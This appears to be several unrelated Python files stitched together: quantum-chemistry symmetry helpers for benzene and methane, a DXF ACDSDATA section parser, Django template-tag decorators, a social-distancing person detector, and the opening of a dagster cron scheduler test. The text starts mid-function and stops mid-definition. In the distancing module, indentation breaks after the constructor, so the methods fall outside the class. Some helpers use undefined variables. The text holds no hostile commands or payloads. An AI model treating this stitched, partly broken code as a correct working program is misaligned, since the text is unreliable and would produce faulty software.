    """Cyclically permute the AO blocks of *M* so atom *atm_idx*'s basis
    functions are shifted to the front (superseded by rotate_matrix)."""
    # AO offset where atom atm_idx's basis functions begin.
    offset = mol.aoslice_by_atom()[atm_idx, -2]
    rotated = np.zeros_like(M)
    # Swap the four quadrants delimited by `offset` (a block-cyclic shift).
    rotated[-offset:, -offset:] = M[:offset, :offset]
    rotated[:-offset, :-offset] = M[offset:, offset:]
    rotated[-offset:, :-offset] = M[:offset, offset:]
    rotated[:-offset, -offset:] = M[offset:, :offset]
    return rotated
def rotate_matrix(M, mol, atm_idx, ref_site=0):  # to rotate the idx of the carbon atoms
    """Cyclically permute the AO indices of *M* so that the basis block of
    atom *ref_site* is carried onto that of atom *atm_idx*.

    Equivalent to the original element-wise definition
    ``Mr[i, j] = M[(i + rpt - pt) % n, (j + rpt - pt) % n]`` for square *M*,
    but vectorized: np.roll performs the cyclic shift of both axes in C
    instead of an O(n^2) Python loop. Returns a new array (input untouched).
    """
    pt = mol.aoslice_by_atom()[atm_idx, -2]
    rpt = mol.aoslice_by_atom()[ref_site, -2]
    # A modular index shift by (rpt - pt) is a roll by (pt - rpt).
    shift = int(pt - rpt)
    # assumes M is square (AO-basis matrix), as in the original implementation
    return np.roll(M, shift=(shift, shift), axis=(0, 1))
def rotate_grad(g, atm_idx, ref_site=0):
    """Cyclically shift the leading (atom) axis of gradient array *g* so the
    entry at *ref_site* moves to *atm_idx*.

    Equivalent to the original loop ``gr[i] = g[(i + ref_site - atm_idx) % n]``
    but done in C by np.roll instead of an O(n) Python loop. Returns a new
    array; *g* is not modified.
    """
    return np.roll(g, atm_idx - ref_site, axis=0)
class benz_Symm:
    """Symmetry helper for (our) benzene: maps quantities computed at a
    reference carbon onto symmetry-equivalent sites via rotations about the
    C6 axis plus cyclic permutation of the atom/AO indices."""
    def __init__(self,mol):
        self.mol=mol
        #for our particular benzene molecule: C6 axis along z (ring in xy plane)
        self.axis=np.array((0,0,1))
        self.irrepr=[0,1]
        # eqs maps atom index -> its reference atom ('ref', same parity) and
        # the rotation ('op') carrying the reference site onto it.
        self.eqs={}
        for eq in range(2,12):
            self.eqs[eq]={'ref':eq%2,'op':R.from_rotvec(-self.axis*np.pi/3*(eq//2))}
    def symm_gradient(self,afr,atm_idx,ref_idx):
        # Rotate the per-atom vectors into the target frame, then permute the
        # atom rows from the reference site onto atm_idx.
        return rotate_grad(self.eqs[atm_idx]['op'].apply(afr),atm_idx,ref_site=ref_idx)
    def rotate_mo1e1(self,mo1,e1,site,ref_idx,C,S):
        # Presumably transforms response matrices (mo1, e1) from the reference
        # site to `site`: rotate in the AO basis, permute AO blocks, project
        # back with C/S -- TODO(review): confirm semantics against the caller.
        nocc=self.mol.nelec[0]
        rm=self.make_RM(site,ref_idx)
        mo1r=(C.T@S@rotate_matrix(rm.T@(C@mo1@C.T[:nocc,:])@rm,self.mol,site,ref_site=ref_idx)@S@C)[:,:nocc]
        e1r=(C.T@S@rotate_matrix(rm.T@(C[:,:nocc]@e1@C.T[:nocc,:])@rm,self.mol,site,ref_site=ref_idx)@S@C)[:nocc,:nocc]
        return (mo1r,e1r)
    def make_RM(self,site,ref_idx):
        """Build the AO-basis rotation matrix: identity for s shells, pyscf
        rotation blocks for p/d/f shells (located via their first AO label)."""
        p_idxs=[i for i,elem in enumerate(self.mol.ao_labels()) if "px" in elem]
        d_idxs=[i for i,elem in enumerate(self.mol.ao_labels()) if "dxy" in elem]
        f_idxs=[i for i,elem in enumerate(self.mol.ao_labels()) if "fy^3" in elem]
        # NOTE(review): Rotation.as_dcm() was deprecated in SciPy 1.4 and
        # removed in 1.6 -- newer SciPy requires .as_matrix() instead.
        rm_p= self.eqs[site]['op'].as_dcm()
        Dm_ao=aorm(self.mol,rm_p)
        rm=np.eye(self.mol.nao)
        for i in p_idxs:
            rm[i:i+3,i:i+3]=Dm_ao[1]
        for i in d_idxs:
            rm[i:i+5,i:i+5]=Dm_ao[2]
        for i in f_idxs:
            rm[i:i+7,i:i+7]=Dm_ao[3]
        return rm
# for methane stuff
def rothess(h):
    # Permute the 5 atom blocks of a Hessian-like array (atom order
    # 0,1,2,3,4 -> 0,1,3,4,2) and rotate each block into the new frame.
    # NOTE(review): `r` is not defined anywhere in this module -- it must be a
    # module-level scipy Rotation injected by the calling script; confirm
    # before relying on this function.
    hr=np.zeros_like(h)
    ridx={0:0,1:1,2:3,3:4,4:2}
    for i in range(5):
        for j in range(5):
            hr[i,j]=r.apply(r.apply(h[ridx[i],ridx[j]]).T).T
    return hr
def rotgrad(g):
    # Rotate a gradient array and swap rows 2,3,4 -> 3,4,2 (companion to
    # rothess above).
    # NOTE(review): depends on the same undefined module-level rotation `r`
    # as rothess -- confirm it is provided by the calling script.
    b=r.apply(g)
    b[[2,3,4]]=b[[3,4,2]]
    return b
|
<reponame>tapnair/DXFer
# Purpose: acdsdata section manager
# Created: 05.05.2014
# Copyright (C) 2014, <NAME>
# License: MIT License
"""
ACDSDATA entities have NO handles, therefor they can not be stored in the drawing entity database.
every routine written until now (2014-05-05) expects entities with a valid handle, which ACDSDATA entities lack
section structure (work in progress):
0 <str> SECTION
2 <str> ACDSDATA
70 <int> 2 # flag?
71 <int> 6 # count of following ACDSSCHEMA entities ??? no, just another flag
0 <str> ACDSSCHEMA # dxftype: schema definition
90 <int> 0 # schema number 0, 1, 2, 3 ...
1 <str> AcDb3DSolid_ASM_Data # schema name
2 <str> AcDbDs::ID # subsection name
280 <int> 10 # subsection type 10 = ???
91 <int> 8 # data ???
2 <str> ASM_Data # subsection name
280 <int> 15 # subsection type
91 <int> 0 # data ???
101 <str> ACDSRECORD # data
95 <int> 0
90 <int> 2
...
0 <str> ACDSSCHEMA
90 <int> 1
1 <str> AcDb_Thumbnail_Schema
...
0 <str> ACDSSCHEMA
90 <int> 2
1 <str> AcDbDs::TreatedAsObjectDataSchema
...
0 <str> ACDSSCHEMA
90 <int> 3
1 <str> AcDbDs::LegacySchema
2 <str> AcDbDs::Legacy
280 <int> 1
91 <int> 0
0 <str> ACDSSCHEMA
90 <int> 4
1 <str> AcDbDs::IndexedPropertySchema
2 <str> AcDs:Indexable
280 <int> 1
91 <int> 0
0 <str> ACDSSCHEMA
90 <int> 5
1 <str> AcDbDs::HandleAttributeSchema
2 <str> AcDbDs::HandleAttribute
280 <int> 7
91 <int> 1
284 <int> 1
0 <str> ACDSRECORD # dxftype: data record
90 <int> 0 # ??? flag
2 <str> AcDbDs::ID # subsection name
280 <int> 10 # subsection type 10 = handle to owner entity, 3DSOLID???
320 <str> 339 # handle
2 <str> ASM_Data # subsection name
280 <int> 15 # subsection type 15 = binary data
94 <int> 1088 # size of data
310 <binary encoded data> # data
310 <binary encoded data> # data
...
0 <str> ENDSEC
"""
from __future__ import unicode_literals
__author__ = "mozman <<EMAIL>>"
from itertools import islice
from ..lldxf.tags import TagGroups, DXFStructureError, write_tags, Tags
class AcDsDataSection(object):
    """Manages the ACDSDATA section of a DXF drawing.

    Entities in this section have no handles, so they are kept in a plain
    list (``self.entities``) instead of the drawing's entity database.
    """
    name = 'acdsdata'
    def __init__(self, tags, drawing):
        self.entities = [] # stores AcDsData objects
        # raw tags between the section header and the first entity (code != 0)
        self.section_info = []
        self.drawing = drawing
        if tags is not None:
            self._build(tags)
    @property
    def dxffactory(self):
        return self.drawing.dxffactory
    @property
    def entitydb(self):
        return self.drawing.entitydb
    def _build(self, tags):
        """Parse the raw section tags into section_info + entity objects.

        Raises DXFStructureError if the SECTION/ENDSEC framing is broken.
        """
        if tags[0] != (0, 'SECTION') or tags[1] != (2, self.name.upper()) or tags[-1] != (0, 'ENDSEC'):
            raise DXFStructureError("Critical structure error in {} section.".format(self.name.upper()))
        if len(tags) == 3: # empty entities section
            return
        # collect header tags until the first code-0 tag starts the entities
        start_index = 2
        while tags[start_index].code != 0:
            self.section_info.append(tags[start_index])
            start_index += 1
        # group remaining tags (excluding the trailing ENDSEC) into entities
        for group in TagGroups(islice(tags, start_index, len(tags)-1)):
            self._append_entity(AcDsData(Tags(group))) # tags have no subclasses
    def _append_entity(self, entity):
        # Upgrade the generic AcDsData wrapper to a specialized class
        # (e.g. AcDsRecord) when one is registered for its dxftype.
        cls = ACDSDATA_TYPES.get(entity.dxftype())
        if cls is not None:
            entity = cls(entity.tags)
        self.entities.append(entity)
    def write(self, stream):
        """Write the whole section (header, info tags, entities, ENDSEC)."""
        stream.write(" 0\nSECTION\n 2\n%s\n" % self.name.upper())
        write_tags(stream, self.section_info)
        for entity in self.entities:
            entity.write(stream)
        stream.write(" 0\nENDSEC\n")
class AcDsData(object):
    """Generic wrapper for an ACDSDATA entity: holds its raw tag list and can
    write it back out verbatim."""

    def __init__(self, tags):
        self.tags = tags

    def write(self, stream):
        """Emit the stored tags unchanged."""
        write_tags(stream, self.tags)

    def dxftype(self):
        """Return the entity type string (value of the leading tag)."""
        first_tag = self.tags[0]
        return first_tag.value
class Section(Tags):
    """A subsection of an ACDSRECORD: tag 0 holds the name, tag 1 the
    subsection type, and everything after that is the payload."""

    @property
    def name(self):
        name_tag = self[0]
        return name_tag.value

    @property
    def type(self):
        type_tag = self[1]
        return type_tag.value

    @property
    def data(self):
        # payload: every tag after name and type
        return self[2:]
class AcDsRecord(object):
    """An ACDSRECORD entity: a dxftype tag, a flags tag, and a list of
    Sections (each section group in the tag stream starts with a code-2 tag)."""
    def __init__(self, tags):
        self._dxftype = tags[0]
        self.flags = tags[1]
        # Split the remaining tags into sections on code 2; the comprehension's
        # `tags` shadows the parameter only inside the list comprehension.
        self.sections = [Section(tags) for tags in TagGroups(islice(tags, 2, None), splitcode=2)]
    def dxftype(self):
        return self._dxftype.value
    def has_section(self, name):
        # True if a section with this name exists (no exception raised).
        return self.get_section(name, default=None) is not None
    def get_section(self, name, default=KeyError):
        """Return the first section named *name*.

        The KeyError class itself is used as the "no default given" sentinel:
        without an explicit *default*, a missing name raises KeyError.
        """
        for section in self.sections:
            if section.name == name:
                return section
        if default is KeyError:
            raise KeyError(name)
        else:
            return default
    def __getitem__(self, name):
        # record['ASM_Data'] is shorthand for get_section('ASM_Data')
        return self.get_section(name)
    def _write_header(self, stream):
        # dxftype + flags tags precede the sections on output
        write_tags(stream, Tags([self._dxftype, self.flags]))
    def write(self, stream):
        """Write the record (header tags, then every section) as DXF tags."""
        self._write_header(stream)
        for section in self.sections:
            write_tags(stream, section)
ACDSDATA_TYPES = {
'ACDSRECORD': AcDsRecord,
} |
# I got this from http://svn.navi.cx/misc/trunk/djblets/djblets/util/decorators.py (sbf)
# It should make useful template tag creation much less tedious and annoying when
# needing any complex functionality such as access to the context or a block
# This is part of the djiblets template library.
#
# decorators.py -- Miscellaneous, useful decorators. This might end up moving
# to something with a different name.
#
# Copyright (c) 2007 <NAME>
# Copyright (c) 2007 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from inspect import getargspec
from django import template
from django.template import TemplateSyntaxError, Variable
# The decorator decorator. This is copyright unknown, verbatim from
# http://wiki.python.org/moin/PythonDecoratorLibrary
def simple_decorator(decorator):
    """This decorator can be used to turn simple functions
    into well-behaved decorators, so long as the decorators
    are fairly simple. If a decorator expects a function and
    returns a function (no descriptors), and if it doesn't
    modify function attributes or docstring, then it is
    eligible to use this. Simply apply @simple_decorator to
    your decorator and it will automatically preserve the
    docstring and function attributes of functions to which
    it is applied."""
    def new_decorator(f):
        wrapped = decorator(f)
        # Copy identity metadata from the wrapped function so introspection
        # (help(), tracebacks, admin tooling) still sees the original.
        wrapped.__name__ = f.__name__
        wrapped.__doc__ = f.__doc__
        wrapped.__dict__.update(f.__dict__)
        return wrapped
    # Make simple_decorator itself well-behaved: the returned decorator
    # carries the metadata of the decorator it wraps.
    new_decorator.__name__ = decorator.__name__
    new_decorator.__doc__ = decorator.__doc__
    new_decorator.__dict__.update(decorator.__dict__)
    return new_decorator
def basictag(takes_context=False):
    """
    A decorator similar to Django's @register.simple_tag that optionally
    takes a context parameter. This condenses many tag implementations down
    to a few lines of code.

    Example:
        @register.tag
        @basictag(takes_context=True)
        def printuser(context):
            return context['user']
    """
    class BasicTagNode(template.Node):
        # Fix: the parameter was misspelled `take_context` and silently
        # ignored in favor of the closure variable; it now matches.
        def __init__(self, takes_context, tag_name, tag_func, args):
            self.takes_context = takes_context
            self.tag_name = tag_name
            self.tag_func = tag_func
            self.args = args

        def render(self, context):
            # Resolve each raw token against the current template context.
            args = [Variable(var).resolve(context) for var in self.args]
            if self.takes_context:
                return self.tag_func(context, *args)
            else:
                return self.tag_func(*args)

    def basictag_func(tag_func):
        def _setup_tag(parser, token):
            bits = token.split_contents()
            tag_name = bits[0]
            del bits[0]
            # NOTE(review): getargspec was removed in Python 3.11 -- migrate
            # to inspect.getfullargspec/signature when dropping Python 2.
            params, xx, xxx, defaults = getargspec(tag_func)
            max_args = len(params)
            if takes_context:
                if params[0] == 'context':
                    max_args -= 1 # Ignore context
                else:
                    # Fix: converted from the Python-2-only
                    # `raise Exc, "msg"` statement form, which is a syntax
                    # error on Python 3.
                    raise TemplateSyntaxError(
                        "Any tag function decorated with takes_context=True "
                        "must have a first argument of 'context'")
            min_args = max_args - len(defaults or [])
            if not min_args <= len(bits) <= max_args:
                if min_args == max_args:
                    raise TemplateSyntaxError(
                        "%r tag takes %d arguments." % (tag_name, min_args))
                else:
                    raise TemplateSyntaxError(
                        "%r tag takes %d to %d arguments, got %d." % (
                            tag_name, min_args, max_args, len(bits)))
            return BasicTagNode(takes_context, tag_name, tag_func, bits)
        # Preserve the wrapped tag function's identity for introspection.
        _setup_tag.__name__ = tag_func.__name__
        _setup_tag.__doc__ = tag_func.__doc__
        _setup_tag.__dict__.update(tag_func.__dict__)
        return _setup_tag
    return basictag_func
def blocktag(tag_func):
    """
    A decorator similar to Django's @register.simple_tag that does all the
    redundant work of parsing arguments and creating a node class in order
    to render content between a foo and endfoo tag block. This condenses
    many tag implementations down to a few lines of code.

    Example:
        @register.tag
        @blocktag
        def divify(context, nodelist, div_id=None):
            s = "<div"
            if div_id:
                s += " id='%s'" % div_id
            return s + ">" + nodelist.render(context) + "</div>"
    """
    class BlockTagNode(template.Node):
        def __init__(self, tag_name, tag_func, nodelist, args):
            self.tag_name = tag_name
            self.tag_func = tag_func
            self.nodelist = nodelist
            self.args = args

        def render(self, context):
            # Resolve each raw token against the current template context.
            args = [Variable(var).resolve(context) for var in self.args]
            return self.tag_func(context, self.nodelist, *args)

    def _setup_tag(parser, token):
        bits = token.split_contents()
        tag_name = bits[0]
        del bits[0]
        # NOTE(review): getargspec was removed in Python 3.11 -- migrate to
        # inspect.getfullargspec/signature when dropping Python 2.
        params, xx, xxx, defaults = getargspec(tag_func)
        max_args = len(params) - 2 # Ignore context and nodelist
        min_args = max_args - len(defaults or [])
        if not min_args <= len(bits) <= max_args:
            # Fix: converted from the Python-2-only `raise Exc, "msg"`
            # statement form, which is a syntax error on Python 3.
            if min_args == max_args:
                raise TemplateSyntaxError(
                    "%r tag takes %d arguments." % (tag_name, min_args))
            else:
                raise TemplateSyntaxError(
                    "%r tag takes %d to %d arguments, got %d." % (
                        tag_name, min_args, max_args, len(bits)))
        # Fix: the comma was outside the parentheses, so parser.parse()
        # received a plain string instead of a 1-tuple; Django's `in` check
        # then did substring matching on tag names. Pass a real tuple.
        nodelist = parser.parse(('end%s' % tag_name,))
        parser.delete_first_token()
        return BlockTagNode(tag_name, tag_func, nodelist, bits)
    # Preserve the wrapped tag function's identity for introspection.
    _setup_tag.__name__ = tag_func.__name__
    _setup_tag.__doc__ = tag_func.__doc__
    _setup_tag.__dict__.update(tag_func.__dict__)
    return _setup_tag
|
import time
import cv2 as cv
import numpy as np
import math
from libs.centroid_object_tracker import CentroidTracker
from scipy.spatial import distance as dist
from libs.loggers.loggers import Logger
class Distancing:
    """Pedestrian detection + social-distance estimation pipeline.

    Wires a device-specific detector, a centroid tracker and a logger
    together, and exposes single-image and video processing entry points.
    """

    def __init__(self, config):
        self.config = config
        self.ui = None
        self.detector = None
        self.device = self.config.get_section_dict('Detector')['Device']
        self.running_video = False
        self.tracker = CentroidTracker(
            max_disappeared=int(self.config.get_section_dict("PostProcessor")["MaxTrackFrame"]))
        self.logger = Logger(self.config)
        # Detector implementations are imported lazily so only the
        # dependencies of the configured device must be installed.
        if self.device == 'Jetson':
            from libs.detectors.jetson.detector import Detector
            self.detector = Detector(self.config)
        elif self.device == 'EdgeTPU':
            from libs.detectors.edgetpu.detector import Detector
            self.detector = Detector(self.config)
        elif self.device == 'Dummy':
            # Dummy device: no detector, frames pass through untouched.
            self.detector = None
        elif self.device == 'x86':
            from libs.detectors.x86.detector import Detector
            self.detector = Detector(self.config)
        else:
            # BUG FIX: an unrecognized device previously left self.detector
            # as None and crashed a few lines later with an AttributeError
            # on `self.detector.name`. Fail fast with a clear message.
            raise ValueError("Unsupported device type: %s" % self.device)
        self.image_size = [int(i) for i in self.config.get_section_dict('Detector')['ImageSize'].split(',')]
        if self.device != 'Dummy':
            print('Device is: ', self.device)
            print('Detector is: ', self.detector.name)
            print('image size: ', self.image_size)
        self.dist_method = self.config.get_section_dict("PostProcessor")["DistMethod"]
        self.dist_threshold = self.config.get_section_dict("PostProcessor")["DistThreshold"]
def set_ui(self, ui):
self.ui = ui
def __process(self, cv_image):
"""
return object_list list of dict for each obj,
obj["bbox"] is normalized coordinations for [x0, y0, x1, y1] of box
"""
if self.device == 'Dummy':
return cv_image, [], None
# Resize input image to resolution
resolution = [int(i) for i in self.config.get_section_dict('App')['Resolution'].split(',')]
cv_image = cv.resize(cv_image, tuple(resolution))
resized_image = cv.resize(cv_image, tuple(self.image_size[:2]))
rgb_resized_image = cv.cvtColor(resized_image, cv.COLOR_BGR2RGB)
tmp_objects_list = self.detector.inference(rgb_resized_image)
[w,h] = resolution
for obj in tmp_objects_list:
box = obj["bbox"]
x0 = box[1]
y0 = box[0]
x1 = box[3]
y1 = box[2]
obj["centroid"] = [(x0 + x1) / 2, (y0 + y1) / 2, x1 - x0, y1 - y0]
obj["bbox"] = [x0, y0, x1, y1]
obj["centroidReal"]=[(x0 + x1)*w / 2, (y0 + y1)*h / 2, (x1 - x0)*w, (y1 - y0)*h]
obj["bboxReal"]=[x0*w,y0*h,x1*w,y1*h]
objects_list, distancings = self.calculate_distancing(tmp_objects_list)
return cv_image, objects_list, distancings
def process_video(self, video_uri):
    """Read frames from *video_uri*, process each one and push the results
    to the logger and UI until the stream ends or running_video is cleared.
    """
    input_cap = cv.VideoCapture(video_uri)
    if input_cap.isOpened():
        print('opened video ', video_uri)
    else:
        print('failed to load video ', video_uri)
        return
    self.running_video = True
    while input_cap.isOpened() and self.running_video:
        ret, cv_image = input_cap.read()
        if not ret or np.shape(cv_image) == ():
            # BUG FIX: the previous version `continue`d on a failed read.
            # For a finished video file isOpened() remains True, so the
            # loop spun forever. Treat a failed read as end-of-stream.
            break
        cv_image, objects, distancings = self.__process(cv_image)
        self.logger.update(objects, distancings)
        self.ui.update(cv_image, objects, distancings)
    input_cap.release()
    self.running_video = False
def process_image(self, image_path):
    """Load the image at *image_path*, process it and forward the results
    to the UI."""
    # Process and pass the image to ui modules
    frame = cv.imread(image_path)
    frame, objects, distancings = self.__process(frame)
    self.ui.update(frame, objects, distancings)
def calculate_distancing(self, objects_list):
"""
this function post-process the raw boxes of object detector and calculate a distance matrix
for detected bounding boxes.
post processing is consist of:
1. omitting large boxes by filtering boxes which are biger than the 1/4 of the size the image.
2. omitting duplicated boxes by applying an auxilary non-maximum-suppression.
3. apply a simple object tracker to make the detection more robust.
params:
object_list: a list of dictionaries. each dictionary has attributes of a detected object such as
"id", "centroid" (a tuple of the normalized centroid coordinates (cx,cy,w,h) of the box) and "bbox" (a tuple
of the normalized (xmin,ymin,xmax,ymax) coordinate of the box)
returns:
object_list: the post processed version of the input
distances: a NxN ndarray which i,j element is distance between i-th and l-th bounding box
"""
new_objects_list = self.ignore_large_boxes(objects_list)
new_objects_list = self.non_max_suppression_fast(new_objects_list,
float(self.config.get_section_dict("PostProcessor")[
"NMSThreshold"]))
tracked_boxes = self.tracker.update(new_objects_list)
new_objects_list = [tracked_boxes[i] for i in tracked_boxes.keys()]
for i, item in enumerate(new_objects_list):
item["id"] = item["id"].split("-")[0] + "-" + str(i)
centroids = np.array( [obj["centroid"] for obj in new_objects_list] )
distances = self.calculate_box_distances(new_objects_list)
return new_objects_list, distances
@staticmethod
def ignore_large_boxes(object_list):
"""
filtering boxes which are biger than the 1/4 of the size the image
params:
object_list: a list of dictionaries. each dictionary has attributes of a detected object such as
"id", "centroid" (a tuple of the normalized centroid coordinates (cx,cy,w,h) of the box) and "bbox" (a tuple
of the normalized (xmin,ymin,xmax,ymax) coordinate of the box)
returns:
object_list: input object list without large boxes
"""
large_boxes = []
for i in range(len(object_list)):
if (object_list[i]["centroid"][2] * object_list[i]["centroid"][3]) > 0.25:
large_boxes.append(i)
updated_object_list = [j for i, j in enumerate(object_list) if i not in large_boxes]
return updated_object_list
@staticmethod
def non_max_suppression_fast(object_list, overlapThresh):
    """Remove duplicated boxes with an auxiliary non-maximum suppression.

    params:
        object_list: a list of dictionaries. each dictionary has attributes
            of a detected object such as "id", "centroid" (a tuple of the
            normalized centroid coordinates (cx,cy,w,h) of the box) and
            "bbox" (a tuple of the normalized (xmin,ymin,xmax,ymax)
            coordinates of the box).
        overlapThresh: overlap ratio above which two boxes count as
            duplicates. NOTE(review): the ratio computed below is
            intersection area divided by the *candidate* box's area, not a
            symmetric IoU — confirm that is intended.
    returns:
        object_list: input object list without duplicated boxes
    """
    # if there are no boxes, return an empty list
    boxes = np.array([item["centroid"] for item in object_list])
    corners = np.array([item["bbox"] for item in object_list])
    if len(boxes) == 0:
        return []
    if boxes.dtype.kind == "i":
        # integer coordinates would truncate the divisions below
        boxes = boxes.astype("float")
    # initialize the list of picked indexes
    pick = []
    # centroid components (cx, cy, w, h) and corner components
    cy = boxes[:, 1]
    cx = boxes[:, 0]
    h = boxes[:, 3]
    w = boxes[:, 2]
    x1 = corners[:, 0]
    x2 = corners[:, 2]
    y1 = corners[:, 1]
    y2 = corners[:, 3]
    area = (h + 1) * (w + 1)
    # process boxes in order of their bottom edge (cy + h/2), keeping the
    # bottom-most box of each overlapping cluster
    idxs = np.argsort(cy + (h / 2))
    while len(idxs) > 0:
        last = len(idxs) - 1
        i = idxs[last]
        pick.append(i)
        # intersection rectangle of box i with every remaining candidate
        # (note: w and h are reused here as intersection width/height)
        xx1 = np.maximum(x1[i], x1[idxs[:last]])
        yy1 = np.maximum(y1[i], y1[idxs[:last]])
        xx2 = np.minimum(x2[i], x2[idxs[:last]])
        yy2 = np.minimum(y2[i], y2[idxs[:last]])
        w = np.maximum(0, xx2 - xx1 + 1)
        h = np.maximum(0, yy2 - yy1 + 1)
        # compute the ratio of overlap
        overlap = (w * h) / area[idxs[:last]]
        # delete all indexes from the index list that have
        # too much overlap with the picked box
        idxs = np.delete(idxs, np.concatenate(([last],
            np.where(overlap > overlapThresh)[0])))
    updated_object_list = [j for i, j in enumerate(object_list) if i in pick]
    return updated_object_list
def calculate_distance_of_two_points_of_boxes(self,first_point, second_point):
"""
This function calculates a distance l for two input corresponding points of two detected bounding boxes.
it is assumed that each person is H = 170 cm tall in real scene to map the distances in the image (in pixels) to
physical distance measures (in meters).
params:
first_point: (x, y, h)-tuple, where x,y is the location of a point (center or each of 4 corners of a bounding box)
and h is the height of the bounding box.
second_point: same tuple as first_point for the corresponding point of other box
returns:
l: Estimated physical distance (in centimeters) between first_point and second_point.
"""
# estimate corresponding points distance
[xc1, yc1, h1] = first_point
[xc2, yc2, h2] = second_point
dx = xc2 - xc1
dy = yc2 - yc1
lx = dx * 170 * (1/h1 + 1/h2)/2
ly = dy * 170 * (1/h1 + 1/h2)/2
l=math.sqrt(lx**2+ly**2)
return l
def calculate_box_distances(self, nn_out):
"""
This function calculates a distance matrix for detected bounding boxes.
Two methods are implemented to calculate the distances, first one estimates distance of center points of the
boxes and second one uses minimum distance of each of 4 points of bounding boxes.
params:
object_list: a list of dictionaries. each dictionary has attributes of a detected object such as
"id", "centroidReal" (a tuple of the centroid coordinates (cx,cy,w,h) of the box) and "bboxReal" (a tuple
of the (xmin,ymin,xmax,ymax) coordinate of the box)
returns:
distances: a NxN ndarray which i,j element is estimated distance between i-th and j-th bounding box in real scene (cm)
"""
distances = []
for i in range(len(nn_out)):
distance_row=[]
for j in range(len(nn_out)):
if i == j:
l = 0
else:
if ( self.dist_method == 'FourCornerPointsDistance' ):
lower_left_of_first_box = [nn_out[i]["bboxReal"][0],nn_out[i]["bboxReal"][1],nn_out[i]["centroidReal"][3]]
lower_right_of_first_box = [nn_out[i]["bboxReal"][2],nn_out[i]["bboxReal"][1],nn_out[i]["centroidReal"][3]]
upper_left_of_first_box = [nn_out[i]["bboxReal"][0],nn_out[i]["bboxReal"][3],nn_out[i]["centroidReal"][3]]
upper_right_of_first_box = [nn_out[i]["bboxReal"][2],nn_out[i]["bboxReal"][3],nn_out[i]["centroidReal"][3]]
lower_left_of_second_box = [nn_out[j]["bboxReal"][0],nn_out[j]["bboxReal"][1],nn_out[j]["centroidReal"][3]]
lower_right_of_second_box = [nn_out[j]["bboxReal"][2],nn_out[j]["bboxReal"][1],nn_out[j]["centroidReal"][3]]
upper_left_of_second_box = [nn_out[j]["bboxReal"][0],nn_out[j]["bboxReal"][3],nn_out[j]["centroidReal"][3]]
upper_right_of_second_box = [nn_out[j]["bboxReal"][2],nn_out[j]["bboxReal"][3],nn_out[j]["centroidReal"][3]]
l1 = self.calculate_distance_of_two_points_of_boxes(lower_left_of_first_box, lower_left_of_second_box)
l2 = self.calculate_distance_of_two_points_of_boxes(lower_right_of_first_box, lower_right_of_second_box)
l3 = self.calculate_distance_of_two_points_of_boxes(upper_left_of_first_box, upper_left_of_second_box)
l4 = self.calculate_distance_of_two_points_of_boxes(upper_right_of_first_box, upper_right_of_second_box)
l = min(l1, l2, l3, l4)
elif ( self.dist_method == 'CenterPointsDistance' ):
center_of_first_box = [nn_out[i]["centroidReal"][0],nn_out[i]["centroidReal"][1],nn_out[i]["centroidReal"][3]]
center_of_second_box = [nn_out[j]["centroidReal"][0],nn_out[j]["centroidReal"][1],nn_out[j]["centroidReal"][3]]
l = self.calculate_distance_of_two_points_of_boxes(center_of_first_box, center_of_second_box)
distance_row.append(l)
distances.append(distance_row)
distances_asarray = np.asarray(distances, dtype=np.float32)
return distances_asarray
|
# python_modules/libraries/dagster-cron/dagster_cron_tests/test_cron_scheduler.py
import os
import re
import subprocess
import sys
from contextlib import contextmanager
from tempfile import TemporaryDirectory
import pytest
import yaml
from dagster import ScheduleDefinition
from dagster.core.definitions import lambda_solid, pipeline, repository
from dagster.core.host_representation import (
ManagedGrpcPythonEnvRepositoryLocationOrigin,
RepositoryLocation,
RepositoryLocationHandle,
)
from dagster.core.instance import DagsterInstance, InstanceType
from dagster.core.launcher.sync_in_memory_run_launcher import SyncInMemoryRunLauncher
from dagster.core.run_coordinator import DefaultRunCoordinator
from dagster.core.scheduler.job import JobState, JobStatus, JobType, ScheduleJobData
from dagster.core.scheduler.scheduler import (
DagsterScheduleDoesNotExist,
DagsterScheduleReconciliationError,
DagsterSchedulerError,
)
from dagster.core.storage.event_log import InMemoryEventLogStorage
from dagster.core.storage.noop_compute_log_manager import NoOpComputeLogManager
from dagster.core.storage.pipeline_run import PipelineRunStatus
from dagster.core.storage.root import LocalArtifactStorage
from dagster.core.storage.runs import InMemoryRunStorage
from dagster.core.storage.schedules import SqliteScheduleStorage
from dagster.core.test_utils import environ
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.seven import get_current_datetime_in_utc, get_timestamp_from_utc_datetime
from dagster_cron import SystemCronScheduler
from freezegun import freeze_time
@pytest.fixture(scope="function")
def restore_cron_tab():
    """Snapshot the user's crontab, clear it for the duration of the test,
    and restore the snapshot afterwards."""
    with TemporaryDirectory() as tempdir:
        crontab_backup = os.path.join(tempdir, "crontab_backup.txt")
        with open(crontab_backup, "wb+") as f:
            try:
                output = subprocess.check_output(["crontab", "-l"])
                f.write(output)
            except subprocess.CalledProcessError:
                # If a crontab hasn't been created yet, the command fails with a
                # non-zero error code
                pass
        try:
            subprocess.check_output(["crontab", "-r"])
        except subprocess.CalledProcessError:
            # If a crontab hasn't been created yet, the command fails with a
            # non-zero error code
            pass
        yield
        # Reinstall the original crontab from the backup file.
        subprocess.check_output(["crontab", crontab_backup])
@pytest.fixture(scope="function")
def unset_dagster_home():
    """Temporarily remove DAGSTER_HOME from the environment, restoring the
    previous value (if any) after the test."""
    saved = os.environ.pop("DAGSTER_HOME", None)
    yield
    if saved is not None:
        os.environ["DAGSTER_HOME"] = saved
@pipeline
def no_config_pipeline():
